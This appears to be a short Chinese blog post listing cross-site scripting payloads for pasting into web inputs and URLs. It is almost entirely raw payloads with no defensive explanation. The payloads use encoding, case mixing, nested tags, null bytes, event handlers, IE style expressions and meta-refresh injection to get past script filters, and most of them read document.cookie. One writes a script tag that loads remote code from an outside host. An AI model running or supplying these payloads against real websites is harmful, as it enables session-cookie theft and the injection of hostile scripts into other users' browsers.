基础:
 
"><script >alert(document.cookie)</script>
 
绕过<script> 标签过滤:
 
%253cscript%253ealert(document.cookie)%253c/script%253e
 
"><s”%2b”cript>alert(document.cookie)</script>
 
"><ScRiPt>alert(document.cookie)</script>
 
"><<script>alert(document.cookie);//<</script>
 
foo%00<script>alert(document.cookie)</script>
 
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
 
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
 

在<script>里:
 
'; alert(document.cookie); var foo='
 
foo\'; alert(document.cookie);//';
 
</script><script >alert(document.cookie)</script>
 
无<script>的xxs:
 
<img src=asdf onerror=alert(document.cookie)>
 
<BODY ONLOAD=alert('XSS')>
 
在ie上可以接受一个样式属性:
 
http://www.2cto.com ?image=s%22%20style=x:expression(alert(document.cookie))
 
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))
 
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
 
在 FF 假如你可以控制 refresh me标签, 你可以用url注入用javascript: :
 
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
 

xss笔记网站：http://ha.ckers.org/xss.html

作者：L.N.博客